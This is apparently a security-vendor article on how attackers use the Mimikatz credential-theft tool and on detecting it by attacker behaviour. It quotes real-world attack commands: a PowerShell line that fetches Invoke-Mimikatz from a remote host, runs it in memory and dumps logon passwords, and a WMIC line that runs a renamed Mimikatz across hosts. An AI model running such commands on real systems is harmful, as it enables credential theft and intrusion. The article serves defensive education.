Defending yourself against this ubiquitous tool requires fresh thinking
Mimikatz – a popular (at least among criminal groups and rogue nation-states) open source credential access toolkit used for privilege escalation. Many in security will have heard of it, but there’s a big threat there for those that have not, writes John Titmus, Director, EMEA, Crowdstrike. They may be at risk or perhaps already are suffering from its near ubiquitous presence.
This is because no matter the adversary it is almost always present in Windows intrusions… Really it’s not just a popular means of credential access, it’s regularly seen in use by both targeted adversaries and pen testers alike due to its utility and effectiveness in bypassing signature-based detection.
We call it the AK47 because whenever threat actors are seeking to gain access to this particular type of intrusion seems to crop up time and time again. Credit for first calling Mimikatz the “AK47 of cyber” goes to my boss and company founder Dmitri Alperovitch.
Threat actors often seek out valid credentials in order to escalate their privileges and extend their nefarious reach within an infrastructure – and they do so via a variety of means. The OverWatch team has observed cases in which adversaries have even employed multiple credential theft techniques against a single victim.
Mimikatz techniques include four key tactics:
- Changing the executable name
- Using a batch file
- Using a PowerShell variant
- Changing command line options
Let’s look at this in a little more detail.
1 – Sneak: Changing the executable name
The most simple and direct technique for using this tool is for the threat actor to copy it to a compromised system, change the name of the executable and launch it using, for example, the following command line:
This allows the actor to access credential information on a system.
2 – Effective: Using a batch file
Other means of launching this tool that have been observed in the wild by our team include using a batch file to copy the tool over to target systems; launching the tool and sending the output to a file; copying the output files back to a central collection point; and finally, deleting all relevant files off of the target systems.
3 – Invoke the power: Using a PowerShell variant
Another means of gaining access to credential information that our analysts have observed is the use of a PowerShell variant of Mimikatz, as seen in the following example:
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’
4 – Ch-ch changes: Changing command line options
During the last quarter of 2018, OverWatch analysts observed a different use of the Mimikatz tool, specifically one that appears to have been modified to change the command line options. It appears as follows:
mnl.exe pr::dg sl::lp et -p
This specific variant of Mimikatz was run against multiple target systems through the use of WMIC.exe, as illustrated below:
Wmic /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”
A whole zoo of techniques: an all-encompassing approach is needed
This variety of effective tactics are a good reason to be monitoring for indicators of attack (IOAs). Each of these techniques are an attempt to evade brittle detection approaches that only rely on looking at command line options of the executable to infer its purpose or checking for presence of relevant strings in the binary file.
There are a number of techniques that threat actors can employ to access credential information, but enterprises need a level of visibility that allows defenders to also see new techniques being used, even when those techniques are specifically aimed at evading or subverting detection mechanisms.
Indicators of attack focus on behavioural aspects of attacker techniques rather than only on typical indicators of compromise (IOCs) such as file names, hashes or single command line options. Newer IOA procedures grant a level of visibility that allows defenders to see new techniques being used, even when these are specifically aimed at evading or subverting detection mechanisms. This is because IOAs focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack.
An IOC is often described in the forensics world as evidence on a computer that indicates that the security of the network has been breached. Investigators usually gather this data after being informed of a suspicious incident, on a scheduled basis, or after the discovery of unusual call-outs from the network. Ideally, this information is gathered to create smarter tools that can detect and quarantine suspicious files in the future. Because IOCs provide a reactive method of tracking the “bad guys”, when you find an IOC, there is a high probability that you have already been compromised.
Such IOCs indicate a whole range of activities ranging from simple file I/O operations to privilege escalation, today’s topic. Behavioural IOA correlation ties these together to detect and prevent malicious activity. The result is technology sophisticated enough to detect when credential theft is occurring from a reflectively injected module in PowerShell, and to prevent that activity before it can actually be observed by the attacker.
Just like antivirus signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, enterprises are moving to an IOA-based approach to better suit their security requirements.